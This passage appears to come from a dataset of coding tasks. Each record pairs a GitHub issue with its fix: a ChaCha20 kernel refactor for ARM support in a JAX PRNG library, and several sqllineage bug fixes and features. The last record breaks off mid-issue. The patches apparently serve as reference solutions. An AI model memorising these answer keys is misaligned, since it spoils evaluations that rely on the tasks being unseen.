- d = rotate_left(d, 16);
- c = _mm_add_epi32(c, d); // c += d;
- b = _mm_xor_si128(b, c); // b ^= c;
- b = rotate_left(b, 12);
- a = _mm_add_epi32(a, b); // a += b;
- d = _mm_xor_si128(d, a); // d ^= a;
- d = rotate_left(d, 8);
- c = _mm_add_epi32(c, d); // c += d;
- b = _mm_xor_si128(b, c); // b ^= c;
- b = rotate_left(b, 7);
- return VectorizedState(a, b, c, d);
+ return rows[i];
}
-void pack_diagonals(VectorizedState& out_state, VectorizedState in_state)
+VectorizedState& VectorizedState::operator+=(VectorizedState other)
{
- out_state[0] = rotate_elements_left<0>(in_state[0]);
- out_state[1] = rotate_elements_left<1>(in_state[1]);
- out_state[2] = rotate_elements_left<2>(in_state[2]);
- out_state[3] = rotate_elements_left<3>(in_state[3]);
+ for (uint i = 0; i < ChaChaStateSizeInRows; ++i)
+ {
+ rows[i] += other.rows[i];
+ }
+ return *this;
}
-void unpack_diagonals(VectorizedState& out_state, VectorizedState in_state)
+VectorizedState VectorizedState::operator+(VectorizedState other) const
{
- out_state[0] = rotate_elements_right<0>(in_state[0]);
- out_state[1] = rotate_elements_right<1>(in_state[1]);
- out_state[2] = rotate_elements_right<2>(in_state[2]);
- out_state[3] = rotate_elements_right<3>(in_state[3]);
+ VectorizedState result(*this);
+ result += other;
+ return result;
}
-VectorizedState double_round_sse(VectorizedState state)
+/// This implements what Bernstein calls a quarterround, but does so in a
+/// vectorized manner, i.e., it performs all quarterrounds over the
+/// state matrix's rows concurrently.
+VectorizedState round(VectorizedState state)
{
- state = quarterround_sse(state);
- pack_diagonals(state, state);
- state = quarterround_sse(state);
- unpack_diagonals(state, state);
-
- return state;
+ StateRow a = state[0];
+ StateRow b = state[1];
+ StateRow c = state[2];
+ StateRow d = state[3];
+ a += b;
+ d ^= a;
+ d <<= 16;
+ c += d;
+ b ^= c;
+ b <<= 12;
+ a += b;
+ d ^= a;
+ d <<= 8;
+ c += d;
+ b ^= c;
+ b <<= 7;
+ return VectorizedState(a, b, c, d);
}
-VectorizedState add_states_sse(VectorizedState x, VectorizedState y)
+void pack_diagonals(VectorizedState& out_state, VectorizedState in_state)
{
- VectorizedState out;
- for (uint i = 0; i < 4; ++i)
- {
- out[i] = _mm_add_epi32(x[i], y[i]);
- }
- return out;
+ out_state[0] = in_state[0].rotate_elements_left<0>();
+ out_state[1] = in_state[1].rotate_elements_left<1>();
+ out_state[2] = in_state[2].rotate_elements_left<2>();
+ out_state[3] = in_state[3].rotate_elements_left<3>();
}
-VectorizedState vectorize_state(const uint32_t state[16])
+void unpack_diagonals(VectorizedState& out_state, VectorizedState in_state)
{
- VectorizedState vec_state;
- for (uint i = 0; i < 4; ++i)
- {
- vec_state[i] = _mm_load_si128(&(reinterpret_cast<const __m128i*>(state)[i]));
- }
- return vec_state;
+ out_state[0] = in_state[0].rotate_elements_right<0>();
+ out_state[1] = in_state[1].rotate_elements_right<1>();
+ out_state[2] = in_state[2].rotate_elements_right<2>();
+ out_state[3] = in_state[3].rotate_elements_right<3>();
}
-void unvectorize_state(uint32_t out_state[16], VectorizedState vec_state)
+VectorizedState double_round(VectorizedState state)
{
- for (uint i = 0; i < 4; ++i)
- {
- _mm_store_si128(&(reinterpret_cast<__m128i*>(out_state)[i]), vec_state[i]);
- }
+ state = round(state);
+ pack_diagonals(state, state);
+ state = round(state);
+ unpack_diagonals(state, state);
+
+ return state;
}
-void chacha20_block_sse(uint32_t out_state[16], const uint32_t in_state[16])
+void chacha20_block(uint32_t out_state[16], const uint32_t in_state[16])
{
- VectorizedState vec_in_state = vectorize_state(in_state);
- VectorizedState vec_tmp_state = double_round_sse(vec_in_state);
+ VectorizedState vec_in_state(in_state);
+ VectorizedState vec_tmp_state = double_round(vec_in_state);
for (uint i = 0; i < ChaChaDoubleRoundCount - 1; ++i)
{
- vec_tmp_state = double_round_sse(vec_tmp_state);
+ vec_tmp_state = double_round(vec_tmp_state);
}
- vec_tmp_state = add_states_sse(vec_in_state, vec_tmp_state);
- unvectorize_state(out_state, vec_tmp_state);
+ vec_tmp_state += vec_in_state;
+ vec_tmp_state.unvectorize(out_state);
}
void cpu_chacha20_block(void* out_buffer, const void** in_buffers)
@@ -103,10 +108,12 @@ void cpu_chacha20_block(void* out_buffer, const void** in_buffers)
uint32_t num_states = *reinterpret_cast<const uint32_t*>(in_buffers[0]);
const uint32_t* in_states = reinterpret_cast<const uint32_t*>(in_buffers[1]);
uint32_t* out_state = reinterpret_cast<uint32_t*>(out_buffer);
+ #ifdef OPENMP_AVAILABLE
#pragma omp parallel for
+ #endif
for (uint32_t i = 0; i < num_states; ++i)
{
uint32_t offset = ChaChaStateSizeInWords * i;
- chacha20_block_sse(out_state + offset, in_states + offset);
+ chacha20_block(out_state + offset, in_states + offset);
}
}
diff --git a/lib/cpu_kernel.hpp b/lib/cpu_kernel.hpp
index b58d2b5..87dd845 100644
--- a/lib/cpu_kernel.hpp
+++ b/lib/cpu_kernel.hpp
@@ -1,70 +1,60 @@
// SPDX-License-Identifier: Apache-2.0
-// SPDX-FileCopyrightText: © 2021 Aalto University
+// SPDX-FileCopyrightText: © 2022 Aalto University
#pragma once
-#include <stdint.h>
-#include <immintrin.h>
-
#include "defs.hpp"
+#include <cpu_kernel_arch.hpp>
-struct VectorizedState
-{
- __m128i values[4];
- VectorizedState() = default;
- VectorizedState(__m128i a, __m128i b, __m128i c, __m128i d) : values{a, b, c, d} { }
- __m128i& operator[](uint i) { return values[i]; }
-};
-__m128i rotate_left(__m128i values, uint num_bits);
-
-VectorizedState quarterround_sse(VectorizedState state);
-
-// Wrap _mm_shuffle_epi32 in a template to enforce that rotation_immediate
-// is always known at compile time.
-template <uint8_t rotation_immediate>
-inline __m128i _mm_shuffle_epi32_templated(__m128i val)
+inline StateRow operator+(StateRow left, StateRow right)
{
- return _mm_shuffle_epi32(val, rotation_immediate);
+ StateRow result(left);
+ result += right;
+ return result;
}
-// Rotate elements in a 4-vec
-template <uint num_positions>
-inline __m128i rotate_elements_left(__m128i vec)
+inline StateRow operator^(StateRow left, StateRow right)
{
- constexpr uint8_t rotation_lookup[4] = {
- 0b11100100,
- 0b00111001,
- 0b01001110,
- 0b10010011
- };
- constexpr uint8_t rotation_immediate = rotation_lookup[num_positions];
- // using the templated wrapper for _mm_shuffle_epi32, otherwise
- // gcc may be confused and decide to not treat rotation_immediate as
- // compile-time known in debug mode (-O0) for some reason, resulting
- // in errors from _mm_shuffle_epi32:
- return _mm_shuffle_epi32_templated<rotation_immediate>(vec);
+ StateRow result(left);
+ result ^= right;
+ return result;
}
-template <uint num_positions>
-inline __m128i rotate_elements_right(__m128i vec)
+inline StateRow operator<<(StateRow row, uint num_bits)
{
- return rotate_elements_left<(4 - num_positions) % 4>(vec);
+ StateRow result(row);
+ result <<= num_bits;
+ return result;
}
-void pack_diagonals(VectorizedState& out_state, VectorizedState in_state);
+template <>
+inline StateRow StateRow::rotate_elements_left<0>() const
+{
+ return *this;
+}
-void unpack_diagonals(VectorizedState& out_state, VectorizedState in_state);
-VectorizedState double_round_sse(VectorizedState state);
+struct VectorizedState
+{
+private:
+ StateRow rows[ChaChaStateSizeInRows];
-VectorizedState add_states_sse(VectorizedState x, VectorizedState y);
+public:
+ VectorizedState() = default;
+ VectorizedState(StateRow a, StateRow b, StateRow c, StateRow d);
+ VectorizedState(const uint32_t state[ChaChaStateSizeInWords]);
-VectorizedState vectorize_state(const uint32_t state[16]);
+ void unvectorize(uint32_t out_state[ChaChaStateSizeInWords]) const;
-void unvectorize_state(uint32_t out_state[16], VectorizedState vec_state);
+ StateRow& operator[](uint i);
-void chacha20_block_sse(uint32_t out_state[16], const uint32_t in_state[16]);
+ VectorizedState& operator+=(VectorizedState other);
+ VectorizedState operator+(VectorizedState other) const;
+};
+void unpack_diagonals(VectorizedState& out_state, VectorizedState in_state);
+void pack_diagonals(VectorizedState& out_state, VectorizedState in_state);
+void chacha20_block(uint32_t out_state[16], const uint32_t in_state[16]);
void cpu_chacha20_block(void* out_buffer, const void** in_buffers);
diff --git a/lib/defs.hpp b/lib/defs.hpp
index c165a3f..8e49838 100644
--- a/lib/defs.hpp
+++ b/lib/defs.hpp
@@ -8,6 +8,8 @@ typedef unsigned int uint;
constexpr uint ChaChaDoubleRoundCount = 10;
constexpr uint ChaChaStateSizeInWords = 16;
constexpr uint ChaChaStateSizeInBytes = 4 * ChaChaStateSizeInWords;
+constexpr uint ChaChaStateWordsPerRow = 4;
+constexpr uint ChaChaStateSizeInRows = ChaChaStateSizeInWords / ChaChaStateWordsPerRow;
#ifdef CUDA_ENABLED
// Constants for Cuda kernels
diff --git a/lib/generic/cpu_kernel_arch.hpp b/lib/generic/cpu_kernel_arch.hpp
new file mode 100644
index 0000000..51a63b0
--- /dev/null
+++ b/lib/generic/cpu_kernel_arch.hpp
@@ -0,0 +1,70 @@
+// SPDX-License-Identifier: Apache-2.0
+// SPDX-FileCopyrightText: © 2022 Aalto University
+
+#pragma once
+
+#include "../defs.hpp"
+#include <stdint.h>
+#include <algorithm>
+
+struct StateRow
+{
+ uint32_t values[ChaChaStateWordsPerRow];
+
+ StateRow() : values() { }
+ StateRow(const uint32_t row_values[ChaChaStateWordsPerRow]) : StateRow()
+ {
+ std::copy_n(row_values, ChaChaStateWordsPerRow, values);
+ }
+
+ inline StateRow& operator+=(const StateRow other)
+ {
+ for (uint i = 0; i < ChaChaStateWordsPerRow; ++i)
+ {
+ values[i] += other.values[i];
+ }
+ return *this;
+ }
+
+ inline StateRow& operator^=(const StateRow other)
+ {
+ for (uint i = 0; i < ChaChaStateWordsPerRow; ++i)
+ {
+ values[i] ^= other.values[i];
+ }
+ return *this;
+ }
+
+ inline StateRow& operator<<=(int num_bits)
+ {
+ for (uint i = 0; i < ChaChaStateWordsPerRow; ++i)
+ {
+ uint32_t val = values[i];
+ values[i] = (val << num_bits) | (val >> (32 - num_bits));
+ }
+ return *this;
+ }
+
+ template <int num_positions>
+ inline StateRow rotate_elements_left() const
+ {
+ StateRow res;
+ for (uint i = 0; i < ChaChaStateWordsPerRow; ++i)
+ {
+ res.values[i] = values[(num_positions + i) % ChaChaStateWordsPerRow];
+ }
+ return res;
+ }
+
+ template <uint num_positions>
+ inline StateRow rotate_elements_right() const
+ {
+ return rotate_elements_left<(ChaChaStateWordsPerRow - num_positions) % ChaChaStateWordsPerRow>();
+ }
+
+ inline void unvectorize(uint32_t out_buffer[ChaChaStateWordsPerRow]) const
+ {
+ std::copy_n(values, ChaChaStateWordsPerRow, out_buffer);
+ }
+
+};
diff --git a/lib/intel/cpu_kernel_arch.hpp b/lib/intel/cpu_kernel_arch.hpp
new file mode 100644
index 0000000..7bc31bb
--- /dev/null
+++ b/lib/intel/cpu_kernel_arch.hpp
@@ -0,0 +1,92 @@
+// SPDX-License-Identifier: Apache-2.0
+// SPDX-FileCopyrightText: © 2022 Aalto University
+
+#pragma once
+
+#include "../defs.hpp"
+#include <stdint.h>
+#include <immintrin.h>
+#include <utility>
+
+
+// Wrap _mm_shuffle_epi32 in a template to enforce that rotation_immediate
+// is always known at compile time.
+template <uint8_t rotation_immediate>
+inline __m128i _mm_shuffle_epi32_templated(__m128i val)
+{
+ return _mm_shuffle_epi32(val, rotation_immediate);
+}
+
+// Rotate elements in a 4-vec
+template <uint num_positions>
+inline __m128i rotate_m128i_left(__m128i vec)
+{
+ constexpr uint8_t rotation_lookup[ChaChaStateWordsPerRow] = {
+ 0b11100100,
+ 0b00111001,
+ 0b01001110,
+ 0b10010011
+ };
+ constexpr uint8_t rotation_immediate = rotation_lookup[num_positions];
+ // using the templated wrapper for _mm_shuffle_epi32, otherwise
+ // gcc may be confused and decide to not treat rotation_immediate as
+ // compile-time known in debug mode (-O0) for some reason, resulting
+ // in errors from _mm_shuffle_epi32:
+ return _mm_shuffle_epi32_templated<rotation_immediate>(vec);
+}
+
+template <>
+inline __m128i rotate_m128i_left<0>(__m128i vec)
+{
+ return vec;
+}
+
+struct StateRow
+{
+private:
+ __m128i values;
+
+public:
+ StateRow() {}
+ StateRow(const uint32_t row_values[ChaChaStateWordsPerRow])
+ : values(_mm_load_si128(reinterpret_cast<const __m128i*>(row_values))) { }
+ StateRow(__m128i vals) : values(std::move(vals)) { }
+
+ inline StateRow& operator+=(const StateRow other)
+ {
+ values = _mm_add_epi32(values, other.values);
+ return *this;
+ }
+
+ inline StateRow& operator^=(const StateRow other)
+ {
+ values = _mm_xor_si128(values, other.values);
+ return *this;
+ }
+
+ inline StateRow& operator<<=(int num_bits)
+ {
+ values = _mm_xor_si128(
+ _mm_slli_epi32(values, num_bits),
+ _mm_srli_epi32(values, 32 - num_bits)
+ ); // (value << num_bits) ^ (value >> (32 - num_bits));
+ return *this;
+ }
+
+ template <uint num_positions>
+ inline StateRow rotate_elements_left() const
+ {
+ return StateRow(rotate_m128i_left<num_positions>(values));
+ }
+
+ template <uint num_positions>
+ inline StateRow rotate_elements_right() const
+ {
+ return rotate_elements_left<(ChaChaStateWordsPerRow - num_positions) % ChaChaStateWordsPerRow>();
+ }
+
+ inline void unvectorize(uint32_t out_buffer[ChaChaStateWordsPerRow]) const
+ {
+ _mm_store_si128(reinterpret_cast<__m128i*>(out_buffer), values);
+ }
+};
diff --git a/lib/python_bindings.cpp b/lib/python_bindings.cpp
index 688ee94..451901d 100644
--- a/lib/python_bindings.cpp
+++ b/lib/python_bindings.cpp
@@ -1,5 +1,5 @@
// SPDX-License-Identifier: Apache-2.0
-// SPDX-FileCopyrightText: © 2021 Aalto University
+// SPDX-FileCopyrightText: © 2022 Aalto University
#include <pybind11/pybind11.h>
@@ -14,6 +14,15 @@ constexpr bool cuda_supported()
#endif
}
+constexpr bool openmp_accelerated()
+{
+#ifdef OPENMP_AVAILABLE
+ return true;
+#else
+ return false;
+#endif
+}
+
PYBIND11_MODULE(native, m)
{
m.def("cpu_chacha20_block_factory",
@@ -25,4 +34,5 @@ PYBIND11_MODULE(native, m)
#endif // CUDA_ENABLED
m.def("cuda_supported", &cuda_supported, "Returns true if CUDA kernels were compiled.");
+ m.def("openmp_accelerated", &openmp_accelerated, "Returns true if CPU kernels are accelerated using OpenMP.");
}
diff --git a/setup.py b/setup.py
index af65e67..98c6646 100644
--- a/setup.py
+++ b/setup.py
@@ -1,5 +1,5 @@
# SPDX-License-Identifier: Apache-2.0
-# SPDX-FileCopyrightText: © 2021 Aalto University
+# SPDX-FileCopyrightText: © 2022 Aalto University
import setuptools
from setuptools import Extension
@@ -70,7 +70,7 @@ def build_extension(self, ext):
_jax_version_lower_constraint = ' >= 0.2.12'
_jax_version_optimistic_upper_constraint = ', <= 2.0.0'
-_jax_version_upper_constraint = ', <= 0.3.15'
+_jax_version_upper_constraint = ', <= 0.3.17'
_version = version_module.VERSION
if 'JAX_CHACHA_PRNG_BUILD' in os.environ:
| Support for ARM based systems
Due to its reliance on Intel SIMD intrinsics, the package can currently not be used on any ARM based systems like Apple's M1.
Support for such systems is desired. Therefore the CPU kernels need to be implemented also using ARM NEON intrinsics.
| 2022-09-06T10:31:59 | 0.0 | [] | [] |
|||
reata/sqllineage | reata__sqllineage-619 | 33b36ee82f39827ea7bd611d14104def888a768c | diff --git a/sqllineage/utils/helpers.py b/sqllineage/utils/helpers.py
index e403ba79..df9c3ede 100644
--- a/sqllineage/utils/helpers.py
+++ b/sqllineage/utils/helpers.py
@@ -17,6 +17,10 @@ def escape_identifier_name(name: str):
for quote_char in quote_chars:
name = name.strip(quote_char)
return name
+ elif name.startswith("[") and name.endswith("]"):
+ # tsql allows quoted identifier with square brackets, see reference
+ # https://learn.microsoft.com/en-us/sql/relational-databases/databases/database-identifiers?view=sql-server-ver16#classes-of-identifiers
+ return name.strip("[]")
else:
return name.lower()
| Tsql table names with square brackets are not resolved correctly
Tsql:
When the same table name or column name has square brackets, the parsing result is considered to be two different objects, but it should actually be the same object.
Is there any configuration where I find that mysql backquotes can be parsed correctly
When the same table name or column name has square brackets, the parsing result treats them as two different objects, but they should actually be the same object.
Is there some configuration for this? I found that MySQL backticks can be parsed correctly.
**SQL**
```sql
insert into [t1] select id from user_tab;
insert into t2 select id from t1
```
**shell**
```shell
sqllineage -e "insert into [t1] select id from user_tab;insert into t2 select id from t1" -d tsql
```
Current parsing
```
Statements(#): 2
Source Tables:
<default>.t1
<default>.user_tab
Target Tables:
<default>.[t1]
<default>.t2
```
Correct parsing
```
Statements(#): 2
Source Tables:
<default>.user_tab
Target Tables:
<default>.t2
Intermediate Tables:
<default>.t1
```
**Python version (available via `python --version`)**
- 3.12.1
**SQLLineage version (available via `sqllineage --version`):**
- 1.5.1
| Thanks for reporting the issue.
Square brackets used around table name is special in tsql to escape identifier names. We should support that.
Ref: https://learn.microsoft.com/en-us/sql/relational-databases/databases/database-identifiers?view=sql-server-ver15#classes-of-identifiers
Should be an easy fix by updating [escape_identifier_name](https://github.com/reata/sqllineage/blob/v1.5.1/sqllineage/utils/helpers.py#L8) function.
Thanks you,please fix. | 2024-05-24T14:43:34 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-593 | 55bbdb8da2fe0d46412dbcbfcf3d8787980027c0 | diff --git a/setup.py b/setup.py
index 12bc4acd..ba421ddb 100644
--- a/setup.py
+++ b/setup.py
@@ -68,7 +68,7 @@ def run(self) -> None:
install_requires=[
"sqlparse==0.4.4",
"networkx>=2.4",
- "sqlfluff==2.3.5",
+ "sqlfluff==3.0.3",
"sqlalchemy>=2.0.0",
],
entry_points={"console_scripts": ["sqllineage = sqllineage.cli:main"]},
diff --git a/sqllineage/core/parser/sqlfluff/utils.py b/sqllineage/core/parser/sqlfluff/utils.py
index 09a7559e..bdeaa06c 100644
--- a/sqllineage/core/parser/sqlfluff/utils.py
+++ b/sqllineage/core/parser/sqlfluff/utils.py
@@ -59,20 +59,12 @@ def find_from_expression_element(segment: BaseSegment) -> Optional[BaseSegment]:
from_clause as grandparent
from_expression/join_clause as parent
"""
- from_expression_element = None
- if segment.type in ["from_clause", "update_statement"]:
- if from_expression := segment.get_child("from_expression"):
- non_bracket = from_expression
- while bracketed := non_bracket.get_child("bracketed"):
- non_bracket = bracketed
- if seg := non_bracket.get_child("from_expression_element"):
- from_expression_element = seg
- elif seg := non_bracket.get_child("from_expression"):
- if sub_seg := seg.get_child("from_expression_element"):
- from_expression_element = sub_seg
- elif segment.type in ("from_expression", "join_clause"):
- if seg := segment.get_child("from_expression_element"):
- from_expression_element = seg
+ try:
+ from_expression_element = next(
+ segment.recursive_crawl("from_expression_element")
+ )
+ except StopIteration:
+ from_expression_element = None
return from_expression_element
@@ -94,14 +86,8 @@ def list_join_clause(segment: BaseSegment) -> List[BaseSegment]:
"""
traverse from_clause, recursively goes into bracket by default
"""
- if from_expression := segment.get_child("from_expression"):
- if bracketed := from_expression.get_child("bracketed"):
- join_clauses = bracketed.get_children("join_clause")
- if inner_bracket := bracketed.get_child("bracketed"):
- join_clauses = list_join_clause(inner_bracket) + join_clauses
- return join_clauses
- else:
- return from_expression.get_children("join_clause")
+ if segment.type in ["from_clause", "update_statement"]:
+ return list(segment.recursive_crawl("join_clause"))
return []
| Clickhouse SQL 'GLOBAL IN' not support
Clickhouse SQL 'GLOBAL IN' not support
sqllineage -f ./sql-global-ck.sql --dialect=clickhouse
```sql
SELECT id, name FROM distributed_table WHERE id GLOBAL IN (SELECT id FROM local_table);
```
Line 1, Position 49: Found unparsable section: 'GLOBAL IN (SELECT id FROM local_table)'
Python 3.8
Sqllineage 1.5.0
| This is not supported by the underlying sqlfluff, not by sqllineage.
Upstream issue https://github.com/sqlfluff/sqlfluff/issues/5256 as reference.
Once they fix the issue and release a new version, we can upgrade the dependency and get this done.
Upstream issue is fixed in sqlfluff==3.0.0a5. Since 3.0.0a5 is an alpha release, we will not upgrade sqllineage dependency and will wait for 3.0.0 instead. But you can manually upgrade your sqlfluff to get unblocked. | 2024-04-07T09:24:14 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-572 | e0fbf32abaf1eb51db27c2b0995a7b3e9cdc3ed0 | diff --git a/sqllineage/core/parser/sqlfluff/extractors/select.py b/sqllineage/core/parser/sqlfluff/extractors/select.py
index f19a3b07..beee03f8 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/select.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/select.py
@@ -59,12 +59,7 @@ def extract(
self.extract_subquery(subqueries, holder)
for segment in segments:
- self._handle_swap_partition(segment, holder)
- self._handle_select_into(segment, holder)
- self.tables.extend(
- self._list_table_from_from_clause_or_join_clause(segment, holder)
- )
- self._handle_column(segment)
+ self._handle_select_statement_child_segments(segment, holder)
if is_set_expression(segment):
for idx, sub_segment in enumerate(
@@ -75,12 +70,7 @@ def extract(
(len(self.columns), len(self.tables))
)
for seg in list_child_segments(sub_segment):
- self.tables.extend(
- self._list_table_from_from_clause_or_join_clause(
- seg, holder
- )
- )
- self._handle_column(seg)
+ self._handle_select_statement_child_segments(seg, holder)
self.end_of_query_cleanup(holder)
@@ -88,6 +78,16 @@ def extract(
return holder
+ def _handle_select_statement_child_segments(
+ self, segment: BaseSegment, holder: SubQueryLineageHolder
+ ):
+ self._handle_swap_partition(segment, holder)
+ self._handle_select_into(segment, holder)
+ self.tables.extend(
+ self._list_table_from_from_clause_or_join_clause(segment, holder)
+ )
+ self._handle_column(segment)
+
@staticmethod
def _handle_swap_partition(segment: BaseSegment, holder: SubQueryLineageHolder):
"""
| Missing target table with tsql parsing into statements with union
**Describe the bug**
* There is an issue with tsql parsing into statements with union, unable to obtain target
**SQL**
```sql
select * into t3 from t1 union all select * from t2
```
- `if` CLI (Command Line Interface): provide the command you're calling and the output.
For example:
```shell
sqllineage -e 'select * into t3 from t1 union all select * from t2' -d tsql
```
```
Statements(#): 1
Source Tables:
<default>.t2
<default>.t3
Target Tables:
```
**Python version (available via `python --version`)**
- 3.12.1
**SQLLineage version (available via `sqllineage --version`):**
- 1.5.0
| The expected output should be:
```
Source Tables:
<default>.t1
<default>.t2
Target Tables:
<default>.t3
```
Is that correct?
Yes, this is correct
Thanks for your confirmation. Looks like we have some issue in handling SELECT INTO + UNION case.
Could you please help fix this? It's really important to me 0.0.
May I ask a question here? When parsing SQL Server stored procedures, I can't parse them directly; I have to remove the create ... begin ... part and keep only the SQL for it to work. How can I parse them directly, or just ignore the create ... begin ... statement? I added silent_mode = True, but it still fails to parse.....
You need to do preprocessing yourself, because [sqlfluff](https://github.com/sqlfluff/sqlfluff) does not support stored procedures, not sqllineage.
ok | 2024-01-31T15:36:51 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-557 | 942fcf4e5578da3f3ce22501b17fbceb5ea9c350 | diff --git a/sqllineage/core/parser/sqlfluff/extractors/create_insert.py b/sqllineage/core/parser/sqlfluff/extractors/create_insert.py
index 7610bac2..1873ab7e 100644
--- a/sqllineage/core/parser/sqlfluff/extractors/create_insert.py
+++ b/sqllineage/core/parser/sqlfluff/extractors/create_insert.py
@@ -1,7 +1,7 @@
from sqlfluff.core.parser import BaseSegment
from sqllineage.core.holders import SubQueryLineageHolder
-from sqllineage.core.models import Path
+from sqllineage.core.models import Path, Table
from sqllineage.core.parser.sqlfluff.extractors.base import BaseExtractor
from sqllineage.core.parser.sqlfluff.extractors.select import SelectExtractor
from sqllineage.core.parser.sqlfluff.models import SqlFluffColumn, SqlFluffTable
@@ -104,6 +104,15 @@ def extract(
if segment.type in ["table_reference", "object_reference"]:
write_obj = SqlFluffTable.of(segment)
holder.add_write(write_obj)
+ # get target table columns from metadata if available
+ if (
+ isinstance(write_obj, Table)
+ and self.metadata_provider
+ and statement.type == "insert_statement"
+ ):
+ holder.add_write_column(
+ *self.metadata_provider.get_table_columns(table=write_obj)
+ )
elif segment.type == "literal":
if segment.raw.isnumeric():
# Special Handling for Spark Bucket Table DDL
| set target table column name from MetaDataProvider
**Is your feature request related to a problem? Please describe.**
sql: "insert into target select user_id, user_name from source"
The target table's columns are id and name,
but the column lineage's target columns come out as user_id and user_name from the SQL parse.
**Describe the solution you'd like**
Use MetaDataProvider to look up the target table's columns and write them to the Holder.
This would make the statement equivalent to "insert into target(id, name) select user_id, user_name from source".
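The positional mapping this implies can be sketched as follows (names here are illustrative, not sqllineage's API):

```python
def pair_columns(target_columns, select_columns):
    # When the INSERT statement omits its column list, pair the target
    # table's columns (as supplied by a metadata lookup) with the
    # selected source columns by position.
    return list(zip(target_columns, select_columns))
```

For the example above, `pair_columns(["id", "name"], ["user_id", "user_name"])` yields the intended lineage pairs.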
| This is a valid case that we definitely want to improve with MetaDataProvider.
I'll come back review the PR after I get MetaDataProvider formally documented and released with v1.5.0. | 2024-01-17T04:54:29 | 0.0 | [] | [] |
||
reata/sqllineage | reata__sqllineage-552 | 0823bf2e32f19d0f64a2c7acb951213db8696b93 | diff --git a/sqllineage/config.py b/sqllineage/config.py
index e1be037d..4cc7dc1b 100644
--- a/sqllineage/config.py
+++ b/sqllineage/config.py
@@ -15,14 +15,36 @@ class _SQLLineageConfigLoader:
# to enable tsql no semicolon splitter mode
"TSQL_NO_SEMICOLON": (bool, False),
}
+ BOOLEAN_TRUE_STRINGS = ("true", "on", "ok", "y", "yes", "1")
def __getattr__(self, item):
if item in self.config:
type_, default = self.config[item]
# require SQLLINEAGE_ prefix from environment variable
- return type_(os.environ.get("SQLLINEAGE_" + item, default))
+ return self.parse_value(
+ os.environ.get("SQLLINEAGE_" + item, default), type_
+ )
else:
return super().__getattribute__(item)
+ @classmethod
+ def parse_value(cls, value, cast):
+ """Parse and cast provided value
+
+ :param value: Stringed value.
+ :param cast: Type to cast return value as.
+
+ :returns: Casted value
+ """
+ if cast is bool:
+ try:
+ value = int(value) != 0
+ except ValueError:
+ value = value.lower().strip() in cls.BOOLEAN_TRUE_STRINGS
+ else:
+ value = cast(value)
+
+ return value
+
SQLLineageConfig = _SQLLineageConfigLoader()
| SQLLineageConfig boolean value returns True for all non-empty strings
**SQLLineageConfig** returns True for all non-empty strings
**Expected**
```
'true', 'on', 'ok', 'y', 'yes', '1'
```
For the strings in the above list, return True, otherwise return False
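The merged fix above can be mirrored in a self-contained sketch:

```python
BOOLEAN_TRUE_STRINGS = ("true", "on", "ok", "y", "yes", "1")

def parse_bool(value) -> bool:
    # Numeric strings follow int semantics (any non-zero value is True);
    # everything else must match the whitelist, case-insensitively.
    try:
        return int(value) != 0
    except ValueError:
        return str(value).lower().strip() in BOOLEAN_TRUE_STRINGS
```

Note that a bool default also passes through cleanly, since `int(True)` is 1.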
| 2024-01-14T12:24:49 | 0.0 | [] | [] |
|||
reata/sqllineage | reata__sqllineage-521 | 0e825c25972c4d2bae0b9910aae90e4d4ebac213 | diff --git a/sqllineage/core/holders.py b/sqllineage/core/holders.py
index f96e7f3d..c62a553f 100644
--- a/sqllineage/core/holders.py
+++ b/sqllineage/core/holders.py
@@ -144,7 +144,7 @@ def expand_wildcard(self, metadata_provider: MetaDataProvider) -> None:
for column in self.write_columns:
if column.raw_name == "*":
tgt_wildcard = column
- for src_wildcard in self._get_source_columns(tgt_wildcard):
+ for src_wildcard in self.get_source_columns(tgt_wildcard):
if source_table := src_wildcard.parent:
src_table_columns = []
if isinstance(source_table, SubQuery):
@@ -169,7 +169,7 @@ def _get_target_table(self) -> Optional[Union[SubQuery, Table]]:
table = next(iter(write_only))
return table
- def _get_source_columns(self, node: Column) -> List[Column]:
+ def get_source_columns(self, node: Column) -> List[Column]:
return [
src
for (src, tgt, edge_type) in self.graph.in_edges(nbunch=node, data="type")
diff --git a/sqllineage/core/models.py b/sqllineage/core/models.py
index 610571bd..85457d45 100644
--- a/sqllineage/core/models.py
+++ b/sqllineage/core/models.py
@@ -147,7 +147,7 @@ def __init__(self, name: str, **kwargs):
"""
self._parent: Set[Union[Path, Table, SubQuery]] = set()
self.raw_name = escape_identifier_name(name)
- self.source_columns = (
+ self.source_columns = [
(
escape_identifier_name(raw_name),
escape_identifier_name(qualifier) if qualifier is not None else None,
@@ -155,7 +155,7 @@ def __init__(self, name: str, **kwargs):
for raw_name, qualifier in kwargs.pop(
"source_columns", ((self.raw_name, None),)
)
- )
+ ]
def __str__(self):
return (
diff --git a/sqllineage/core/parser/__init__.py b/sqllineage/core/parser/__init__.py
index 73d24af2..f9c7ea1b 100644
--- a/sqllineage/core/parser/__init__.py
+++ b/sqllineage/core/parser/__init__.py
@@ -25,8 +25,16 @@ def end_of_query_cleanup(self, holder: SubQueryLineageHolder) -> None:
if len(holder.write) > 1:
raise SQLLineageException
tgt_tbl = list(holder.write)[0]
+ lateral_aliases = set()
for idx, tgt_col in enumerate(col_grp):
tgt_col.parent = tgt_tbl
+ for lateral_alias_ref in col_grp[idx + 1 :]: # noqa: E203
+ if any(
+ src_col[0] == tgt_col.raw_name
+ for src_col in lateral_alias_ref.source_columns
+ ):
+ lateral_aliases.add(tgt_col.raw_name)
+ break
for src_col in tgt_col.to_source_columns(
self.get_alias_mapping_from_table_group(tbl_grp, holder)
):
@@ -37,6 +45,22 @@ def end_of_query_cleanup(self, holder: SubQueryLineageHolder) -> None:
# for invalid query: create view test (col3, col4) select col1 as col2 from tab,
# when the length doesn't match, we fall back to default behavior
tgt_col = write_columns[idx]
+ is_lateral_alias_ref = False
+ for wc in holder.write_columns:
+ if wc.raw_name == "*":
+ continue
+ if (
+ src_col.raw_name == wc.raw_name
+ and src_col.raw_name in lateral_aliases
+ ):
+ is_lateral_alias_ref = True
+ for lateral_alias_col in holder.get_source_columns(wc):
+ holder.add_column_lineage(
+ lateral_alias_col, tgt_col
+ )
+ break
+ if is_lateral_alias_ref:
+ continue
holder.add_column_lineage(src_col, tgt_col)
@classmethod
| Support Lateral Column Alias Reference Analyzing
**SQL**
```sql
insert into public.tgt_tbl1
(
id
